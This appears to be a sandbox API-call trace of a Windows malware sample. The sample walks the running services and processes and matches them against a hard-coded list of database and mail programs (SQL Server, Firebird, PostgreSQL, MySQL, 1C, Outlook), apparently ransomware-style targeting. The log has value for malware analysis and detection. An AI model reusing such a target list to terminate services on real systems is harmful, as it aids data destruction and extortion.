	[0138.406] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1
	[0138.406] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1
	[0138.406] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1
	[0138.406] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1
	[0138.406] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1
	[0138.406] lstrlenW (lpString="EventSystem") returned 11
	[0138.406] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1
	[0138.406] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1
	[0138.406] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1
	[0138.406] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1
	[0138.406] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1
	[0138.406] lstrlenW (lpString="gpsvc") returned 5
	[0138.406] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1
	[0138.406] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1
	[0138.406] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1
	[0138.406] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1
	[0138.406] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1
	[0138.406] lstrlenW (lpString="LanmanWorkstation") returned 17
	[0138.406] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0138.406] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0138.406] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1
	[0138.407] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1
	[0138.407] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1
	[0138.407] lstrlenW (lpString="lmhosts") returned 7
	[0138.407] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1
	[0138.407] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1
	[0138.407] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1
	[0138.407] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1
	[0138.407] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1
	[0138.407] lstrlenW (lpString="MMCSS") returned 5
	[0138.407] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1
	[0138.407] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1
	[0138.407] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1
	[0138.407] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1
	[0138.407] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1
	[0138.407] lstrlenW (lpString="MpsSvc") returned 6
	[0138.407] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1
	[0138.407] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1
	[0138.407] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1
	[0138.407] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1
	[0138.407] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1
	[0138.407] lstrlenW (lpString="NlaSvc") returned 6
	[0138.407] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1
	[0138.407] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1
	[0138.407] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1
	[0138.407] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1
	[0138.407] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1
	[0138.407] lstrlenW (lpString="nsi") returned 3
	[0138.407] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1
	[0138.407] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1
	[0138.407] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1
	[0138.407] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1
	[0138.407] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1
	[0138.407] lstrlenW (lpString="PcaSvc") returned 6
	[0138.407] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1
	[0138.408] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1
	[0138.408] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1
	[0138.408] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1
	[0138.408] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1
	[0138.408] lstrlenW (lpString="PlugPlay") returned 8
	[0138.408] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1
	[0138.408] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1
	[0138.408] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1
	[0138.408] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1
	[0138.408] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1
	[0138.408] lstrlenW (lpString="Power") returned 5
	[0138.408] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1
	[0138.408] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1
	[0138.408] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1
	[0138.408] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1
	[0138.408] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1
	[0138.408] lstrlenW (lpString="ProfSvc") returned 7
	[0138.408] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1
	[0138.408] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1
	[0138.408] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1
	[0138.408] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1
	[0138.408] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1
	[0138.408] lstrlenW (lpString="RpcEptMapper") returned 12
	[0138.408] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0138.408] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0138.408] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1
	[0138.408] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1
	[0138.408] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1
	[0138.408] lstrlenW (lpString="RpcSs") returned 5
	[0138.408] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1
	[0138.408] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1
	[0138.408] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1
	[0138.408] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1
	[0138.408] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1
	[0138.408] lstrlenW (lpString="SamSs") returned 5
	[0138.409] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1
	[0138.409] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1
	[0138.409] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1
	[0138.409] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1
	[0138.409] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1
	[0138.409] lstrlenW (lpString="Schedule") returned 8
	[0138.409] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1
	[0138.409] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1
	[0138.409] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1
	[0138.409] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1
	[0138.409] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1
	[0138.409] lstrlenW (lpString="SENS") returned 4
	[0138.409] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1
	[0138.409] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1
	[0138.409] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1
	[0138.409] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1
	[0138.409] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1
	[0138.409] lstrlenW (lpString="ShellHWDetection") returned 16
	[0138.409] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0138.409] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0138.409] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1
	[0138.409] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1
	[0138.409] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1
	[0138.409] lstrlenW (lpString="Spooler") returned 7
	[0138.409] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1
	[0138.409] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1
	[0138.409] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1
	[0138.409] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1
	[0138.409] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1
	[0138.409] lstrlenW (lpString="Themes") returned 6
	[0138.409] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1
	[0138.409] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1
	[0138.409] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1
	[0138.409] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1
	[0138.410] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1
	[0138.410] lstrlenW (lpString="UxSms") returned 5
	[0138.410] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1
	[0138.410] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1
	[0138.410] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1
	[0138.410] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1
	[0138.410] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1
	[0138.410] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0xb61f938 | out: hHeap=0x7ab0000) returned 1
	[0138.410] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x324
	[0138.412] Process32FirstW (in: hSnapshot=0x324, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0138.412] Process32NextW (in: hSnapshot=0x324, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0138.412] lstrlenW (lpString="System") returned 6
	[0138.412] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1
	[0138.412] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1
	[0138.412] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1
	[0138.412] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1
	[0138.412] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1
	[0138.412] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1
	[0138.412] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1
	[0138.412] Process32NextW (in: hSnapshot=0x324, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0138.413] lstrlenW (lpString="smss.exe") returned 8
	[0138.413] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1
	[0138.413] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1
	[0138.413] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1
	[0138.413] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1
	[0138.413] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1
	[0138.413] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1
	[0138.413] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1
	[0138.413] Process32NextW (in: hSnapshot=0x324, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0138.413] lstrlenW (lpString="csrss.exe") returned 9
	[0138.413] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0138.413] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0138.413] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0138.413] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0138.413] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0138.413] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0138.413] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0138.413] Process32NextW (in: hSnapshot=0x324, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0138.414] lstrlenW (lpString="wininit.exe") returned 11
	[0138.414] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1
	[0138.414] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1
	[0138.414] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1
	[0138.414] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1
	[0138.414] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1
	[0138.414] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1
	[0138.414] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1
	[0138.414] Process32NextW (in: hSnapshot=0x324, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0138.414] lstrlenW (lpString="csrss.exe") returned 9
	[0138.414] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0138.414] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0138.414] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0138.414] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0138.414] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0138.414] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0138.414] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0138.414] Process32NextW (in: hSnapshot=0x324, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0138.415] lstrlenW (lpString="winlogon.exe") returned 12
	[0138.415] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1
	[0138.415] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1
	[0138.415] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1
	[0138.415] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1
	[0138.415] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1
	[0138.415] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1
	[0138.415] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1
	[0138.415] Process32NextW (in: hSnapshot=0x324, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0138.415] lstrlenW (lpString="services.exe") returned 12
	[0138.415] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1
	[0138.415] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1
	[0138.415] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1
	[0138.415] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1
	[0138.415] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1
	[0138.415] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1
	[0138.415] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1
	[0138.415] Process32NextW (in: hSnapshot=0x324, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0138.416] lstrlenW (lpString="lsass.exe") returned 9
	[0138.416] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1
	[0138.416] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1
	[0138.416] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1
	[0138.416] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1
	[0138.416] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1
	[0138.416] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1
	[0138.416] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1
	[0138.416] Process32NextW (in: hSnapshot=0x324, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0138.416] lstrlenW (lpString="lsm.exe") returned 7
	[0138.416] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1
	[0138.416] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1
	[0138.416] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1
	[0138.416] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1
	[0138.416] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1
	[0138.416] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1
	[0138.416] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1
	[0138.416] Process32NextW (in: hSnapshot=0x324, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0138.417] lstrlenW (lpString="svchost.exe") returned 11
	[0138.417] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0138.417] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0138.417] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0138.417] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1
	[0138.417] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1
	[0138.417] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1
	[0138.417] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1
	[0138.417] Process32NextW (in: hSnapshot=0x324, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0138.417] lstrlenW (lpString="svchost.exe") returned 11
	[0138.417] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0138.417] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0138.417] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0138.417] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1
	[0138.417] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1
	[0138.417] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1
	[0138.417] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1
	[0138.417] Process32NextW (in: hSnapshot=0x324, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0138.418] lstrlenW (lpString="svchost.exe") returned 11
	[0138.418] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0138.418] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0138.418] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0138.418] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1
	[0138.418] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1
	[0138.418] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1
	[0138.418] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1
	[0138.418] Process32NextW (in: hSnapshot=0x324, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0138.418] lstrlenW (lpString="svchost.exe") returned 11
	[0138.418] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0138.418] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0138.418] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0138.418] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1
	[0138.418] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1
	[0138.418] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1
	[0138.418] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1
	[0138.418] Process32NextW (in: hSnapshot=0x324, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0138.419] lstrlenW (lpString="svchost.exe") returned 11
	[0138.419] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0138.419] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0138.419] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0138.419] Process32NextW (in: hSnapshot=0x324, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0138.419] lstrlenW (lpString="audiodg.exe") returned 11
	[0138.419] Process32NextW (in: hSnapshot=0x324, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0138.419] lstrlenW (lpString="svchost.exe") returned 11
	[0138.420] Process32NextW (in: hSnapshot=0x324, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0138.420] lstrlenW (lpString="svchost.exe") returned 11
	[0138.420] Process32NextW (in: hSnapshot=0x324, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0138.420] lstrlenW (lpString="spoolsv.exe") returned 11
	[0138.420] Process32NextW (in: hSnapshot=0x324, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0138.420] lstrlenW (lpString="svchost.exe") returned 11
	[0138.420] Process32NextW (in: hSnapshot=0x324, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x474, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0138.421] lstrlenW (lpString="taskhost.exe") returned 12
	[0138.421] Process32NextW (in: hSnapshot=0x324, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1
	[0138.421] lstrlenW (lpString="userinit.exe") returned 12
